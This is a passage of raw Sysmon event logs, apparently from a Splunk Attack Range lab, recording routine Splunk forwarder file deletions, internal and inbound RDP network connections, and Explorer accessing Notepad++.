Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=32DAAACCB2E955A9C9E386B9C5C6633E,SHA256=C4688B7E17BCF3B39553C502FE061ADD97F8DC7CF7C7273C1C43D3F58A9497AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057740Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:44.893{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D16B503C6E7BB6AA331CC4E59CFCECD2,SHA256=E78E018100E294BD4DC8009EC2DED0D20927826906B1C6C90E93B85D653A99D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057739Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:44.471{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C09496F1F5188E1DF3416046FE85AF70,SHA256=D1480E414905C8C62F87E7918469A3B4E4B8652BFA16591CFEA6560A0560A559,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057743Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:45.471{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=34C9E19A43833761BF6B78E716814A17,SHA256=65D0EC7E0F78FACDEF3A2988EFD746EEB0BF22E1AB5823FFBBB60F37955314A6,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000982112Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:40.718{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59586-false10.0.1.12-8000- 354300x80000000000000001057742Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:43.447{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-58665-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001057747Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:46.471{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3141A2634602C3BBB278F1F800074933,SHA256=FC8299FEBF4A348683275D23D1832C0DF31D87761A29B7601D875F81313CA5C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982113Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:46.083{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90502F2AB793B9BDFE2A29A2529A9416,SHA256=BF2470B45A4223773551FFC49A0C5ABB0A451E56BE9B79AB4EE692E52844EB3D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001057746Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:44.721{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse212.102.34.245unn-212-102-34-245.datapacket.com27908-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001057745Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:44.462{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-59319-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001057744Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:46.128{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=32DAAACCB2E955A9C9E386B9C5C6633E,SHA256=C4688B7E17BCF3B39553C502FE061ADD97F8DC7CF7C7273C1C43D3F58A9497AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057748Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:47.660{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B410CED38D1ACFB6C7C423D077B54812,SHA256=E1E4D178B3185B8F054E2AF58CBDE4B6B4B8AD6C68A7300C961C63962A1BD433,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982114Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:47.317{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E3C470C8574C2B30489F41009C11407,SHA256=C910EF43CF0CE2BB1668296BF40FA2B86FC65CE100DAF31EED9168BB4BDBD661,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057750Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:48.690{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=87854AFBB6A74AAB275B6EED63D08D29,SHA256=36D84C50688FB8E8BA5EC3609D38DB071DD2A189FDF0524EE82069A59376AB69,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982115Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:48.349{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A41B611A33408C6A0903D5C7BEF6F83E,SHA256=303F398B3DF13931907B1A16FB7EBA67CFAAAD9099B5A5F5FDAFB4F98F38B03B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001057749Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:46.112{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54311-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x80000000000000001057756Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:49.847{5EBD8912-8D2A-6151-9600-00000000FD01}46325064C:\Windows\Explorer.EXE{5EBD8912-8D68-6151-AC00-00000000FD01}5236C:\Program Files\Notepad++\notepad++.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+17e4d|C:\Windows\System32\SHELL32.dll+61dd0|C:\Windows\System32\SHELL32.dll+62df7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057755Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:49.847{5EBD8912-8D2A-6151-9600-00000000FD01}46325064C:\Windows\Explorer.EXE{5EBD8912-8D68-6151-AC00-00000000FD01}5236C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62df7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057754Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:49.847{5EBD8912-8D2A-6151-9600-00000000FD01}46324904C:\Windows\Explorer.EXE{5EBD8912-8D68-6151-AC00-00000000FD01}5236C:\Program Files\Notepad++\notepad++.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+17e4d|C:\Windows\System32\SHELL32.dll+61dd0|C:\Windows\System32\SHELL32.dll+62820|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057753Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:49.847{5EBD8912-8D2A-6151-9600-00000000FD01}46324904C:\Windows\Explorer.EXE{5EBD8912-8D68-6151-AC00-00000000FD01}5236C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62820|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057752Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:49.847{5EBD8912-8D2A-6151-9600-00000000FD01}46324904C:\Windows\Explorer.EXE{5EBD8912-8D68-6151-AC00-00000000FD01}5236C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+f5319|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001057751Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:49.690{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=974A8611357F63A393855A14941AFE34,SHA256=A0F6FBC8B090D24B545D25DD706B4526E1AFF628C1ADF4E35E5BFFCFC05D646A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982116Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:49.364{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE264E72997A0DA8DD8DC1E549CF37F0,SHA256=7FFF241AB7D4EF3E165F6AF0EE5844417F1C36DC48690CB081D03489E748CCC2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057757Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:50.800{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=148727632AD555A9C3572CCEF7C1FF56,SHA256=393F5FCB8C95291DD209B806039413FF04839C7F406708D4509E8BE1A9B73FBF,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000982118Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:46.750{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59587-false10.0.1.12-8000- 23542300x8000000000000000982117Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:50.396{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1373E4BA60993F4A42585B12B9E99877,SHA256=1BD319BCF73E248C3BB43CAA44998BF765835F563DE222C3AD5280AC9F756C73,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982119Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:51.614{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D36C2B9AC1A3B9581B386665F8858363,SHA256=43024AE791FAE9B1FCF963C77E2E18784E4501B7A97F360EDFBBAFD74ED72CFA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057758Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:51.816{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF8581BFF416087BA89BC8A474498FFF,SHA256=90DAD9F2417DB6A834A0F3E0A8229F7565E0D88CEC248443EB192CEC352648C1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057759Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:52.831{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6479A7A9A6C35D1ABCEC8C6B09DCE3E,SHA256=8964877C95FECC4E291E5C362FBA0CCA0D05B7895C979EE584923BE72CF28C3E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982120Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:52.724{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9FC5CCE666F482CF1B2E8C39237FA89F,SHA256=7B5C401A9580983C777A24A8E035E6F5F58FBF376405C6D9901CBB865049EA52,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982124Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:53.817{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=29478789F62DBE01FAC6CCFAD2AB0BFA,SHA256=E869E5EC35288BB33B966C1784FD660AC034C4467E31CD9F6A91C55B929E12A7,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001057760Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:52.002{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54312-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000982123Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:53.458{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E516E00C426DB530F3A7C2F2497B6A50,SHA256=E8E30ED267CA63DAA702CF00DF98B7A53F0D8E4A7161DFDCCF5D362EA4D65C0D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982122Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:53.458{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BEAC296404FF933A4F90D902D1795583,SHA256=5CF92495959BE2F0B97C4B2CE0C21BE7AAE574EC14DC19BC9109243FEA0BE434,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000982121Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:50.666{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-63999-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x80000000000000001057761Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:54.050{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4564515F8AD7763073342F0C8F9C9604,SHA256=593ECA565A990C3F2DA9ADCB12E3E80743EB72C56B98CDE7A4D8530D6003B6F8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982125Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:55.052{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=31DCC469BEFE79F129D1A283EFD0EA4B,SHA256=7F3B5CB4B2D6CE91BF1DB5CC4E82B6931C9A24F65A5C20D54994EB6F64B1999E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057762Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:55.066{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A47463B88F689D420BE27AEB133E249,SHA256=E813E44733BDA76E25C4214E26417E7BC80A5772A340C30678753A7D653992AD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982129Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:56.521{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E516E00C426DB530F3A7C2F2497B6A50,SHA256=E8E30ED267CA63DAA702CF00DF98B7A53F0D8E4A7161DFDCCF5D362EA4D65C0D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000982128Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:53.797{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-60097-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000982127Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:52.750{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59588-false10.0.1.12-8000- 23542300x8000000000000000982126Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:56.286{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=39BED4FC05628ECE6342663E03AF982D,SHA256=75A7AFA3DFC74301CC3467B0F5F667619F4BDD0E2C7A8F51E454D0C7048DBA1B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057763Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:56.066{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=921A3CBD3F5E5E460A8C5F5D9DF388C4,SHA256=6882673DC79B742A59F0E23B9D9F94B955532866A1FE9B0CE9ED80B1D9C7ECDE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982131Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:57.786{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DB219E6D2150DCD775E8B014A4D36AEB,SHA256=5EEEADC199D8D1B7A8085C50BF0DBD0D01F242EBFC89CBE308E8E5CC94AC8BEA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982130Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:57.458{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F217009A21BB688B7C34BDD1681FFD0B,SHA256=E88B8609C256948ECAC3C09951F3326AECD5C05B1ACCD377250A3C503DC9E1C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057764Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:57.098{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4070B50AF0DEFBDDB97B5242DC7688D2,SHA256=D7976CF7D5B5564CD90316C241FD754BFBE532B6127E54961DE619100FB777F7,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001057766Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:57.159{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54313-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001057765Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:58.160{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E70910EF9766837DC83452F0F539B9A0,SHA256=451D6902F0410EADD7D04C185711E6D9446B8F806BE81B86900AF94B13DD17B5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000982133Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:54.255{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-49888-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000982132Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:58.474{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=948D69D69CCD56F673DDBBC54FE768B1,SHA256=81D14B623AB92A10F024243B7C656DF1629F38C09C75F8FEEFC864C7F172F046,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982134Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:59.489{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A192EBF0648609D3D00199D43095F0DD,SHA256=6A7351E3CC2091EAFBCE1756C7C8D0445E48262D69FC8E6AED981FB5BF86BFE1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057767Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:59.192{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D67C6F8EB2BF15A619DBD8FD5EDE2C74,SHA256=F2A7346CF6D4BD88D10E1E50459600EC14F30645260D80693ECCCAADE8A821ED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057771Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:00.676{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 